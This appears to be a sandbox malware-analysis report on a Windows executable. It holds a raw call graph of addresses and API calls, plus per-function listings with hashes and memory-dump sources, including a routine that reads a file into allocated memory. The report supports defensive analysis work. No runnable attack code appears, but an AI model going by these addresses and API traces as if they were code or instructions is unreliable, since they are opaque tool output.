952a91 97942->97943 97945 8e50f5 40 API calls 97943->97945 97944->97604 97947 952aa1 97945->97947 97946 9529ed 98021 90d583 26 API calls 97946->98021 97948 8e50f5 40 API calls 97947->97948 97950 952abc 97948->97950 97951 8e50f5 40 API calls 97950->97951 97952 952acc 97951->97952 97953 8e50f5 40 API calls 97952->97953 97955 952ae7 97953->97955 97954->97942 97954->97944 97956 8e50f5 40 API calls 97955->97956 97957 952af7 97956->97957 97958 8e50f5 40 API calls 97957->97958 97959 952b07 97958->97959 97960 8e50f5 40 API calls 97959->97960 97961 952b17 97960->97961 98007 953017 GetTempPathW GetTempFileNameW 97961->98007 97963 952b22 97964 90e5eb 29 API calls 97963->97964 97974 952b33 97964->97974 97965 952bed 97966 90e678 67 API calls 97965->97966 97967 952bf8 97966->97967 97969 952c12 97967->97969 97970 952bfe DeleteFileW 97967->97970 97968 8e50f5 40 API calls 97968->97974 97971 952c91 CopyFileW 97969->97971 97977 952c18 97969->97977 97970->97944 97972 952ca7 DeleteFileW 97971->97972 97973 952cb9 DeleteFileW 97971->97973 97972->97944 98017 952fd8 CreateFileW 97973->98017 97974->97944 97974->97965 97974->97968 98008 90dbb3 97974->98008 98022 9522ce 79 API calls 97977->98022 97979 952c7c 97979->97973 97980 952c80 DeleteFileW 97979->97980 97980->97944 97981->97532 97983 8e33dd 97982->97983 97984 9230bb 97982->97984 98069 8e33ee 97983->98069 97986 8ffddb 22 API calls 97984->97986 97988 9230c5 _wcslen 97986->97988 97987 8e33e8 97987->97557 97989 8ffe0b 22 API calls 97988->97989 97990 9230fe __fread_nolock 97989->97990 97991->97566 97992->97579 97993->97852 97996 8e6382 97994->97996 98001 8e63b6 __fread_nolock 97994->98001 97995 924a82 97998 8ffddb 22 API calls 97995->97998 97996->97995 97997 8e63a9 97996->97997 97996->98001 97999 8ea587 22 API calls 97997->97999 98000 924a91 97998->98000 97999->98001 98002 8ffe0b 22 API calls 98000->98002 98001->97868 98003 924ac5 __fread_nolock 98002->98003 98004->97870 98005->97910 98006->97912 98007->97963 98009 90dbc1 98008->98009 98015 90dbdd 98008->98015 98010 90dbe3 98009->98010 98011 90dbcd 98009->98011 98009->98015 98023 90d9cc 98010->98023 98026 90f2d9 20 API calls __dosmaperr 98011->98026 98014 90dbd2 98027 9127ec 26 API calls pre_c_initialization 98014->98027 98015->97974 98018 953013 98017->98018 98019 952fff SetFileTime CloseHandle 98017->98019 98018->97944 98019->98018 98020->97946 98021->97954 98022->97979 98028 90d97b 98023->98028 98025 90d9f0 98025->98015 98026->98014 98027->98015 98029 90d987 ___BuildCatchObject 98028->98029 98036 90918d EnterCriticalSection 98029->98036 98031 90d995 98037 90d9f4 98031->98037 98035 90d9b3 __fread_nolock 98035->98025 98036->98031 98045 9149a1 98037->98045 98043 90d9a2 98044 90d9c0 LeaveCriticalSection __fread_nolock 98043->98044 98044->98035 98046 90d955 __fread_nolock 26 API calls 98045->98046 98047 9149b0 98046->98047 98048 91f89b __fread_nolock 26 API calls 98047->98048 98049 9149b6 98048->98049 98053 90da09 98049->98053 98066 913820 21 API calls __dosmaperr 98049->98066 98051 914a15 98052 9129c8 _free 20 API calls 98051->98052 98052->98053 98054 90da3a 98053->98054 98056 90da4c 98054->98056 98060 90da24 98054->98060 98055 90da5a 98067 90f2d9 20 API calls __dosmaperr 98055->98067 98056->98055 98056->98060 98064 90da85 __fread_nolock 98056->98064 98058 90da5f 98068 9127ec 26 API calls pre_c_initialization 98058->98068 98065 914a56 62 API calls 98060->98065 98061 90dc0b 62 API calls 98061->98064 98062 90d955 __fread_nolock 26 API calls 98062->98064 98063 9159be __wsopen_s 62 API calls 98063->98064 98064->98060 98064->98061 98064->98062 98064->98063 98065->98043 98066->98051 98067->98058 98068->98060 98070 8e33fe _wcslen 98069->98070 98071 92311d 98070->98071 98072 8e3411 98070->98072 98073 8ffddb 22 API calls 98071->98073 98074 8ea587 22 API calls 98072->98074 98075 923127 98073->98075 98076 8e341e __fread_nolock 98074->98076 98077 8ffe0b 22 API calls 98075->98077 98076->97987 98078 923157 __fread_nolock 98077->98078 98080 950f7e 98079->98080 98094 951097 98079->98094 98081 950f9e 98080->98081 98082 950fcb 98080->98082 98084 950fe2 98080->98084 98081->98082 98087 950fb2 98081->98087 98083 8ffe0b 22 API calls 98082->98083 98088 950fc0 __fread_nolock 98083->98088 98085 8ffe0b 22 API calls 98084->98085 98095 950fff 98084->98095 98085->98095 98086 951026 98090 8ffe0b 22 API calls 98086->98090 98089 8ffe0b 22 API calls 98087->98089 98091 8ffddb 22 API calls 98088->98091 98089->98088 98092 95102c 98090->98092 98091->98094 98098 8ff1d8 22 API calls 98092->98098 98094->97610 98095->98086 98095->98087 98095->98088 98096 951038 98099 8ff6c9 24 API calls 98096->98099 98098->98096 98099->98088 98100 933a41 98104 9510c0 98100->98104 98102 933a4c 98103 9510c0 53 API calls 98102->98103 98103->98102 98105 9510cd 98104->98105 98114 9510fa 98104->98114 98106 9510fc 98105->98106 98107 951101 98105->98107 98112 9510f4 98105->98112 98105->98114 98116 8ffa11 53 API calls 98106->98116 98109 8e7510 53 API calls 98107->98109 98110 951108 98109->98110 98111 8e6350 22 API calls 98110->98111 98111->98114 98115 8eb270 39 API calls 98112->98115 98114->98102 98115->98114 98116->98107 98117 932a00 98132 8ed7b0 messages 98117->98132 98118 8edb11 PeekMessageW 98118->98132 98119 8ed807 GetInputState 98119->98118 98119->98132 98121 931cbe TranslateAcceleratorW 98121->98132 98122 8eda04 timeGetTime 98122->98132 98123 8edb8f PeekMessageW 98123->98132 98124 8edb73 TranslateMessage DispatchMessageW 98124->98123 98125 8edbaf Sleep 98143 8edbc0 98125->98143 98126 932b74 Sleep 98126->98143 98127 8fe551 timeGetTime 98127->98143 98128 931dda timeGetTime 98183 8fe300 23 API calls 98128->98183 98131 932c0b GetExitCodeProcess 98135 932c21 WaitForSingleObject 98131->98135 98136 932c37 CloseHandle 98131->98136 98132->98118 98132->98119 98132->98121 98132->98122 98132->98123 98132->98124 98132->98125 98132->98126 98132->98128 98137 8ed9d5 98132->98137 98145 8eec40 235 API calls 98132->98145 98146 8f1310 235 API calls 98132->98146 98147 8ebf40 235 API calls 98132->98147 98149 8edfd0 98132->98149 98177 8fedf6 98132->98177 98182 8edd50 235 API calls 98132->98182 98184 953a2a 23 API calls 98132->98184 98185 95359c 82 API calls __wsopen_s 98132->98185 98133 9729bf GetForegroundWindow 98133->98143 98135->98132 98135->98136 98136->98143 98138 932a31 98138->98137 98139 932ca9 Sleep 98139->98132 98143->98127 98143->98131 98143->98132 98143->98133 98143->98137 98143->98138 98143->98139 98186 965658 23 API calls 98143->98186 98187 94e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98143->98187 98188 94d4dc 47 API calls 98143->98188 98145->98132 98146->98132 98147->98132 98150 8ee010 98149->98150 98151 932f7a 98150->98151 98154 8ee075 98150->98154 98152 8eec40 235 API calls 98151->98152 98153 932f8c 98152->98153 98166 8ee0dc messages 98153->98166 98191 95359c 82 API calls __wsopen_s 98153->98191 98154->98166 98192 900242 5 API calls __Init_thread_wait 98154->98192 98158 932fca 98160 8ea961 22 API calls 98158->98160 98158->98166 98159 8ea961 22 API calls 98159->98166 98163 932fe4 98160->98163 98193 9000a3 29 API calls __onexit 98163->98193 98166->98159 98168 8eec40 235 API calls 98166->98168 98171 8ea8c7 22 API calls 98166->98171 98172 8f04f0 22 API calls 98166->98172 98173 95359c 82 API calls 98166->98173 98174 8ee3e1 98166->98174 98189 8ea81b 41 API calls 98166->98189 98190 8fa308 235 API calls 98166->98190 98195 900242 5 API calls __Init_thread_wait 98166->98195 98196 9000a3 29 API calls __onexit 98166->98196 98197 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98166->98197 98198 9647d4 235 API calls 98166->98198 98199 9668c1 235 API calls 98166->98199 98167 932fee 98194 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98167->98194 98168->98166 98171->98166 98172->98166 98173->98166 98174->98132 98178 8fee09 98177->98178 98179 8fee12 98177->98179 98178->98132 98179->98178 98180 8fee36 IsDialogMessageW 98179->98180 98181 93efaf GetClassLongW 98179->98181 98180->98178 98180->98179 98181->98179 98181->98180 98182->98132 98183->98132 98184->98132 98185->98132 98186->98143 98187->98143 98188->98143 98189->98166 98190->98166 98191->98166 98192->98158 98193->98167 98194->98166 98195->98166 98196->98166 98197->98166 98198->98166 98199->98166 98200 918402 98205 9181be 98200->98205 98204 91842a 98210 9181ef try_get_first_available_module 98205->98210 98207 9183ee 98224 9127ec 26 API calls pre_c_initialization 98207->98224 98209 918343 98209->98204 98217 920984 98209->98217 98213 918338 98210->98213 98220 908e0b 40 API calls 2 library calls 98210->98220 98212 91838c 98212->98213 98221 908e0b 40 API calls 2 library calls 98212->98221 98213->98209 98223 90f2d9 20 API calls __dosmaperr 98213->98223 98215 9183ab 98215->98213 98222 908e0b 40 API calls 2 library calls 98215->98222 98225 920081 98217->98225 98219 92099f 98219->98204 98220->98212 98221->98215 98222->98213 98223->98207 98224->98209 98228 92008d ___BuildCatchObject 98225->98228 98226 92009b 98282 90f2d9 20 API calls __dosmaperr 98226->98282 98228->98226 98230 9200d4 98228->98230 98229 9200a0 98283 9127ec 26 API calls pre_c_initialization 98229->98283 98236 92065b 98230->98236 98235 9200aa __fread_nolock 98235->98219 98237 920678 98236->98237 98238 9206a6 98237->98238 98239 92068d 98237->98239 98285 915221 98238->98285 98299 90f2c6 20 API calls __dosmaperr 98239->98299 98242 9206ab 98243 9206b4 98242->98243 98244 9206cb 98242->98244 98301 90f2c6 20 API calls __dosmaperr 98243->98301 98298 92039a CreateFileW 98244->98298 98248 9206b9 98302 90f2d9 20 API calls __dosmaperr 98248->98302 98249 9200f8 98284 920121 LeaveCriticalSection __wsopen_s 98249->98284 98251 920781 GetFileType 98253 9207d3 98251->98253 98254 92078c GetLastError 98251->98254 98252 920704 98252->98251 98256 920756 GetLastError 98252->98256 98303 92039a CreateFileW 98252->98303 98307 91516a 21 API calls 2 library calls 98253->98307 98305 90f2a3 20 API calls __dosmaperr 98254->98305 98255 920692 98300 90f2d9 20 API calls __dosmaperr 98255->98300 98304 90f2a3 20 API calls __dosmaperr 98256->98304 98259 92079a CloseHandle 98259->98255 98261 9207c3 98259->98261 98306 90f2d9 20 API calls __dosmaperr 98261->98306 98263 920749 98263->98251 98263->98256 98265 9207f4 98267 920840 98265->98267 98308 9205ab 72 API calls 3 library calls 98265->98308 98266 9207c8 98266->98255 98271 92086d 98267->98271 98309 92014d 72 API calls 4 library calls 98267->98309 98270 920866 98270->98271 98272 92087e 98270->98272 98273 9186ae __wsopen_s 29 API calls 98271->98273 98272->98249 98274 9208fc CloseHandle 98272->98274 98273->98249 98310 92039a CreateFileW 98274->98310 98276 920927 98277 92095d 98276->98277 98278 920931 GetLastError 98276->98278 98277->98249 98311 90f2a3 20 API calls __dosmaperr 98278->98311 98280 92093d 98312 915333 21 API calls 2 library calls 98280->98312 98282->98229 98283->98235 98284->98235 98286 91522d ___BuildCatchObject 98285->98286 98313 912f5e EnterCriticalSection 98286->98313 98288 915234 98290 915259 98288->98290 98294 9152c7 EnterCriticalSection 98288->98294 98295 91527b 98288->98295 98291 915000 __wsopen_s 21 API calls 98290->98291 98293 91525e 98291->98293 98292 9152a4 __fread_nolock 98292->98242 98293->98295 98317 915147 EnterCriticalSection 98293->98317 98294->98295 98296 9152d4 LeaveCriticalSection 98294->98296 98314 91532a 98295->98314 98296->98288 98298->98252 98299->98255 98300->98249 98301->98248 98302->98255 98303->98263 98304->98255 98305->98259 98306->98266 98307->98265 98308->98267 98309->98270 98310->98276 98311->98280 98312->98277 98313->98288 98318 912fa6 LeaveCriticalSection 98314->98318 98316 915331 98316->98292 98317->98295 98318->98316 98319 8e105b 98324 8e344d 98319->98324 98321 8e106a 98355 9000a3 29 API calls __onexit 98321->98355 98323 8e1074 98325 8e345d __wsopen_s 98324->98325 98326 8ea961 22 API calls 98325->98326 98327 8e3513 98326->98327 98356 8e3a5a 98327->98356 98329 8e351c 98363 8e3357 98329->98363 98332 8e33c6 22 API calls 98333 8e3535 98332->98333 98334 8e515f 22 API calls 98333->98334 98335 8e3544 98334->98335 98336 8ea961 22 API calls 98335->98336 98337 8e354d 98336->98337 98338 8ea6c3 22 API calls 98337->98338 98339 8e3556 RegOpenKeyExW 98338->98339 98340 923176 RegQueryValueExW 98339->98340 98344 8e3578 98339->98344 98341 923193 98340->98341 98342 92320c RegCloseKey 98340->98342 98343 8ffe0b 22 API calls 98341->98343 98342->98344 98354 92321e _wcslen 98342->98354 98345 9231ac 98343->98345 98344->98321 98346 8e5722 22 API calls 98345->98346 98347 9231b7 RegQueryValueExW 98346->98347 98349 9231d4 98347->98349 98351 9231ee messages 98347->98351 98348 8e4c6d 22 API calls 98348->98354 98350 8e6b57 22 API calls 98349->98350 98350->98351 98351->98342 98352 8e9cb3 22 API calls 98352->98354 98353 8e515f 22 API calls 98353->98354 98354->98344 98354->98348 98354->98352 98354->98353 98355->98323 98357 921f50 __wsopen_s 98356->98357 98358 8e3a67 GetModuleFileNameW 98357->98358 98359 8e9cb3 22 API calls 98358->98359 98360 8e3a8d 98359->98360 98361 8e3aa2 23 API calls 98360->98361 98362 8e3a97 98361->98362 98362->98329 98364 921f50 __wsopen_s 98363->98364 98365 8e3364 GetFullPathNameW 98364->98365 98366 8e3386 98365->98366 98367 8e6b57 22 API calls 98366->98367 98368 8e33a4 98367->98368 98368->98332 98369 8e1098 98374 8e42de 98369->98374 98373 8e10a7 98375 8ea961 22 API calls 98374->98375 98376 8e42f5 GetVersionExW 98375->98376 98377 8e6b57 22 API calls 98376->98377 98378 8e4342 98377->98378 98379 8e93b2 22 API calls 98378->98379 98391 8e4378 98378->98391 98380 8e436c 98379->98380 98382 8e37a0 22 API calls 98380->98382 98381 8e441b GetCurrentProcess IsWow64Process 98383 8e4437 98381->98383 98382->98391 98384 8e444f LoadLibraryA 98383->98384 98385 923824 GetSystemInfo 98383->98385 98386 8e449c GetSystemInfo 98384->98386 98387 8e4460 GetProcAddress 98384->98387 98390 8e4476 98386->98390 98387->98386 98389 8e4470 GetNativeSystemInfo 98387->98389 98388 9237df 98389->98390 98392 8e447a FreeLibrary 98390->98392 98393 8e109d 98390->98393 98391->98381 98391->98388 98392->98393 98394 9000a3 29 API calls __onexit 98393->98394 98394->98373 98395 922ba5 98396 8e2b25 98395->98396 98397 922baf 98395->98397 98423 8e2b83 7 API calls 98396->98423 98399 8e3a5a 24 API calls 98397->98399 98401 922bb8 98399->98401 98403 8e9cb3 22 API calls 98401->98403 98405 922bc6 98403->98405 98404 8e2b2f 98415 8e2b44 98404->98415 98427 8e3837 98404->98427 98406 922bf5 98405->98406 98407 922bce 98405->98407 98409 8e33c6 22 API calls 98406->98409 98408 8e33c6 22 API calls 98407->98408 98411 922bd9 98408->98411 98412 922bf1 GetForegroundWindow ShellExecuteW 98409->98412 98413 8e6350 22 API calls 98411->98413 98419 922c26 98412->98419 98417 922be7 98413->98417 98414 8e2b5f 98421 8e2b66 SetCurrentDirectoryW 98414->98421 98415->98414 98437 8e30f2 Shell_NotifyIconW ___scrt_fastfail 98415->98437 98420 8e33c6 22 API calls 98417->98420 98419->98414 98420->98412 98422 8e2b7a 98421->98422 98438 8e2cd4 7 API calls 98423->98438 98425 8e2b2a 98426 8e2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98425->98426 98426->98404 98428 8e3862 ___scrt_fastfail 98427->98428 98439 8e4212 98428->98439 98430 8e38e8 98433 923386 Shell_NotifyIconW 98430->98433 98434 8e3906 Shell_NotifyIconW 98430->98434 98443 8e3923 98434->98443 98436 8e391c 98436->98415 98437->98414 98438->98425 98440 9235a4 98439->98440 98441 8e38b7 98439->98441 98440->98441 98442 9235ad DestroyIcon 98440->98442 98441->98430 98465 94c874 42 API calls _strftime 98441->98465 98442->98441 98444 8e393f 98443->98444 98463 8e3a13 98443->98463 98445 8e6270 22 API calls 98444->98445 98446 8e394d 98445->98446 98447 923393 LoadStringW 98446->98447 98448 8e395a 98446->98448 98451 9233ad 98447->98451 98449 8e6b57 22 API calls 98448->98449 98450 8e396f 98449->98450 98452 8e397c 98450->98452 98453 9233c9 98450->98453 98454 8ea8c7 22 API calls 98451->98454 98459 8e3994 ___scrt_fastfail 98451->98459 98452->98451 98455 8e3986 98452->98455 98456 8e6350 22 API calls 98453->98456 98454->98459 98457 8e6350 22 API calls 98455->98457 98458 9233d7 98456->98458 98457->98459 98458->98459 98460 8e33c6 22 API calls 98458->98460 98461 8e39f9 Shell_NotifyIconW 98459->98461 98462 9233f9 98460->98462 98461->98463 98464 8e33c6 22 API calls 98462->98464 98463->98436 98464->98459 98465->98430 98466 8e3156 98469 8e3170 98466->98469 98470 8e3187 98469->98470 98471 8e318c 98470->98471 98472 8e31eb 98470->98472 98473 8e31e9 98470->98473 98474 8e3199 98471->98474 98475 8e3265 PostQuitMessage 98471->98475 98477 922dfb 98472->98477 98478 8e31f1 98472->98478 98476 8e31d0 DefWindowProcW 98473->98476 98480 8e31a4 98474->98480 98481 922e7c 98474->98481 98482 8e316a 98475->98482 98476->98482 98525 8e18e2 10 API calls 98477->98525 98483 8e321d SetTimer RegisterWindowMessageW 98478->98483 98484 8e31f8 98478->98484 98486 8e31ae 98480->98486 98487 922e68 98480->98487 98529 94bf30 34 API calls ___scrt_fastfail 98481->98529 98483->98482 98488 8e3246 CreatePopupMenu 98483->98488 98490 922d9c 98484->98490 98491 8e3201 KillTimer 98484->98491 98485 922e1c 98526 8fe499 42 API calls 98485->98526 98495 8e31b9 98486->98495 98496 922e4d 98486->98496 98514 94c161 98487->98514 98488->98482 98498 922da1 98490->98498 98499 922dd7 MoveWindow 98490->98499 98521 8e30f2 Shell_NotifyIconW ___scrt_fastfail 98491->98521 98501 8e31c4 98495->98501 98502 8e3253 98495->98502 98496->98476 98528 940ad7 22 API calls 98496->98528 98497 922e8e 98497->98476 98497->98482 98503 922dc6 SetFocus 98498->98503 98504 922da7 98498->98504 98499->98482 98500 8e3214 98522 8e3c50 DeleteObject DestroyWindow 98500->98522 98501->98476 98527 8e30f2 Shell_NotifyIconW ___scrt_fastfail 98501->98527 98523 8e326f 44 API calls ___scrt_fastfail 98502->98523 98503->98482 98504->98501 98508 922db0 98504->98508 98524 8e18e2 10 API calls 98508->98524 98509 8e3263 98509->98482 98512 922e41 98513 8e3837 49 API calls 98512->98513 98513->98473 98515 94c276 98514->98515 98516 94c179 ___scrt_fastfail 98514->98516 98515->98482 98517 8e3923 24 API calls 98516->98517 98519 94c1a0 98517->98519 98518 94c25f KillTimer SetTimer 98518->98515 98519->98518 98520 94c251 Shell_NotifyIconW 98519->98520 98520->98518 98521->98500 98522->98482 98523->98509 98524->98482 98525->98485 98526->98501 98527->98512 98528->98473 98529->98497 98530 8e2e37 98531 8ea961 22 API calls 98530->98531 98532 8e2e4d 98531->98532 98609 8e4ae3 98532->98609 98534 8e2e6b 98535 8e3a5a 24 API calls 98534->98535 98536 8e2e7f 98535->98536 98537 8e9cb3 22 API calls 98536->98537 98538 8e2e8c 98537->98538 98539 8e4ecb 94 API calls 98538->98539 98540 8e2ea5 98539->98540 98541 922cb0 98540->98541 98542 8e2ead 98540->98542 98543 952cf9 80 API calls 98541->98543 98546 8ea8c7 22 API calls 98542->98546 98544 922cc3 98543->98544 98545 922ccf 98544->98545 98547 8e4f39 68 API calls 98544->98547 98551 8e4f39 68 API calls 98545->98551 98548 8e2ec3 98546->98548 98547->98545 98623 8e6f88 22 API calls 98548->98623 98550 8e2ecf 98552 8e9cb3 22 API calls 98550->98552 98553 922ce5 98551->98553 98554 8e2edc 98552->98554 98639 8e3084 22 API calls 98553->98639 98624 8ea81b 41 API calls 98554->98624 98556 8e2eec 98559 8e9cb3 22 API calls 98556->98559 98558 922d02 98640 8e3084 22 API calls 98558->98640 98561 8e2f12 98559->98561 98625 8ea81b 41 API calls 98561->98625 98562 922d1e 98565 8e3a5a 24 API calls 98562->98565 98564 8e2f21 98569 8ea961 22 API calls 98564->98569 98566 922d44 98565->98566 98641 8e3084 22 API calls 98566->98641 98568 922d50 98571 8ea8c7 22 API calls 98568->98571 98570 8e2f3f 98569->98570 98626 8e3084 22 API calls 98570->98626 98573 922d5e 98571->98573 98642 8e3084 22 API calls 98573->98642 98574 8e2f4b 98627 904a28 40 API calls 3 library calls 98574->98627 98577 922d6d 98580 8ea8c7 22 API calls 98577->98580 98578 8e2f59 98578->98553 98579 8e2f63 98578->98579 98628 904a28 40 API calls 3 library calls 98579->98628 98582 922d83 98580->98582 98643 8e3084 22 API calls 98582->98643 98583 8e2f6e 98583->98558 98585 8e2f78 98583->98585 98629 904a28 40 API calls 3 library calls 98585->98629 98586 922d90 98588 8e2f83 98588->98562 98589 8e2f8d 98588->98589 98630 904a28 40 API calls 3 library calls 98589->98630 98591 8e2f98 98592 8e2fdc 98591->98592 98631 8e3084 22 API calls 98591->98631 98592->98577 98593 8e2fe8 98592->98593 98593->98586 98633 8e63eb 22 API calls 98593->98633 98595 8e2fbf 98597 8ea8c7 22 API calls 98595->98597 98599 8e2fcd 98597->98599 98598 8e2ff8 98634 8e6a50 22 API calls 98598->98634 98632 8e3084 22 API calls 98599->98632 98602 8e3006 98635 8e70b0 23 API calls 98602->98635 98606 8e3021 98607 8e3065 98606->98607 98636 8e6f88 22 API calls 98606->98636 98637 8e70b0 23 API calls 98606->98637 98638 8e3084 22 API calls 98606->98638 98610 8e4af0 __wsopen_s 98609->98610 98611 8e6b57 22 API calls 98610->98611 98612 8e4b22 98610->98612 98611->98612 98613 8e4c6d 22 API calls 98612->98613 98619 8e4b58 98612->98619 98613->98612 98614 8e9cb3 22 API calls 98616 8e4c52 98614->98616 98615 8e9cb3 22 API calls 98615->98619 98618 8e515f 22 API calls 98616->98618 98617 8e4c6d 22 API calls 98617->98619 98621 8e4c5e 98618->98621 98619->98615 98619->98617 98620 8e515f 22 API calls 98619->98620 98622 8e4c29 98619->98622 98620->98619 98621->98534 98622->98614 98622->98621 98623->98550 98624->98556 98625->98564 98626->98574 98627->98578 98628->98583 98629->98588 98630->98591 98631->98595 98632->98592 98633->98598 98634->98602 98635->98606 98636->98606 98637->98606 98638->98606 98639->98558 98640->98562 98641->98568 98642->98577 98643->98586 98644 8e1033 98649 8e4c91 98644->98649 98648 8e1042 98650 8ea961 22 API calls 98649->98650 98651 8e4cff 98650->98651 98657 8e3af0 98651->98657 98653 8e4d9c 98655 8e1038 98653->98655 98660 8e51f7 22 API calls __fread_nolock 98653->98660 98656 9000a3 29 API calls __onexit 98655->98656 98656->98648 98661 8e3b1c 98657->98661 98660->98653 98662 8e3b0f 98661->98662 98663 8e3b29 98661->98663 98662->98653 98663->98662 98664 8e3b30 RegOpenKeyExW 98663->98664 98664->98662 98665 8e3b4a RegQueryValueExW 98664->98665 98666 8e3b6b 98665->98666 98667 8e3b80 RegCloseKey 98665->98667 98666->98667 98667->98662 98668 be2123 98671 be1d98 98668->98671 98670 be216f 98672 bdf7c8 GetPEB 98671->98672 98680 be1e37 98672->98680 98674 be1e68 CreateFileW 98674->98680 98681 be1e75 98674->98681 98675 be1e91 VirtualAlloc 98676 be1eb2 ReadFile 98675->98676 98675->98681 98679 be1ed0 VirtualAlloc 98676->98679 98676->98681 98677 be2084 VirtualFree 98678 be2092 98677->98678 98678->98670 98679->98680 98679->98681 98680->98675 98680->98681 98682 be1f98 CloseHandle 98680->98682 98683 be1fa8 VirtualFree 98680->98683 98684 be2ca8 GetPEB 98680->98684 98681->98677 98681->98678 98682->98680 98683->98680 98685 be2cd2 98684->98685 98685->98674

                                                                    Executed Functions

                                                                    Function 008E42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 234 8e42de-8e434d call 8ea961 GetVersionExW call 8e6b57 239 923617-92362a 234->239 240 8e4353 234->240 242 92362b-92362f 239->242 241 8e4355-8e4357 240->241 243 8e435d-8e43bc call 8e93b2 call 8e37a0 241->243 244 923656 241->244 245 923632-92363e 242->245 246 923631 242->246 263 8e43c2-8e43c4 243->263 264 9237df-9237e6 243->264 250 92365d-923660 244->250 245->242 247 923640-923642 245->247 246->245 247->241 249 923648-92364f 247->249 249->239 252 923651 249->252 253 923666-9236a8 250->253 254 8e441b-8e4435 GetCurrentProcess IsWow64Process 250->254 252->244 253->254 258 9236ae-9236b1 253->258 256 8e4437 254->256 257 8e4494-8e449a 254->257 260 8e443d-8e4449 256->260 257->260 261 9236b3-9236bd 258->261 262 9236db-9236e5 258->262 265 8e444f-8e445e LoadLibraryA 260->265 266 923824-923828 GetSystemInfo 260->266 267 9236ca-9236d6 261->267 268 9236bf-9236c5 261->268 270 9236e7-9236f3 262->270 271 9236f8-923702 262->271 263->250 269 8e43ca-8e43dd 263->269 272 923806-923809 264->272 273 9237e8 264->273 276 8e449c-8e44a6 GetSystemInfo 265->276 277 8e4460-8e446e GetProcAddress 265->277 267->254 268->254 278 923726-92372f 269->278 279 8e43e3-8e43e5 269->279 270->254 281 923704-923710 271->281 282 923715-923721 271->282 274 9237f4-9237fc 272->274 275 92380b-92381a 272->275 280 9237ee 273->280 274->272 275->280 285 92381c-923822 275->285 287 8e4476-8e4478 276->287 277->276 286 8e4470-8e4474 GetNativeSystemInfo 277->286 283 923731-923737 278->283 284 92373c-923748 278->284 288 8e43eb-8e43ee 279->288 289 92374d-923762 279->289 280->274 281->254 282->254 283->254 284->254 285->274 286->287 292 8e447a-8e447b FreeLibrary 287->292 293 8e4481-8e4493 287->293 294 923791-923794 288->294 295 8e43f4-8e440f 288->295 290 923764-92376a 289->290 291 92376f-92377b 289->291 290->254 291->254 292->293 294->254 298 92379a-9237c1 294->298 296 923780-92378c 295->296 297 8e4415 295->297 296->254 297->254 299 9237c3-9237c9 298->299 300 9237ce-9237da 298->300 299->254 300->254
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 008E430D
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    • GetCurrentProcess.KERNEL32(?,0097CB64,00000000,?,?), ref: 008E4422
                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 008E4429
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 008E4454
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008E4466
                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 008E4474
                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 008E447B
                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 008E44A0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                    • API String ID: 3290436268-3101561225
                                                                    • Opcode ID: b6c6e08a9c2c21f0e56a03c305565724206e58cb6f9309d4abc579037f9f06d2
                                                                    • Instruction ID: 8b9d0b73634e9a2dae175b204fd3060636daca614b9bb1f12b6a88ae64ac4ea0
                                                                    • Opcode Fuzzy Hash: b6c6e08a9c2c21f0e56a03c305565724206e58cb6f9309d4abc579037f9f06d2
                                                                    • Instruction Fuzzy Hash: 9CA1386293E3D4CFCB11C7797E611993FE8BB23324B8896ACE045D3B65F2240544EB25
                                                                    Function 008E42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 553 8e42a2-8e42ba CreateStreamOnHGlobal 554 8e42bc-8e42d3 FindResourceExW 553->554 555 8e42da-8e42dd 553->555 556 8e42d9 554->556 557 9235ba-9235c9 LoadResource 554->557 556->555 557->556 558 9235cf-9235dd SizeofResource 557->558 558->556 559 9235e3-9235ee LockResource 558->559 559->556 560 9235f4-923612 559->560 560->556
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008E50AA,?,?,00000000,00000000), ref: 008E42B2
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008E50AA,?,?,00000000,00000000), ref: 008E42C9
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20), ref: 009235BE
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,008E50AA,?,?,00000000,00000000,?,?,?,?,?,?,008E4F20), ref: 009235D3
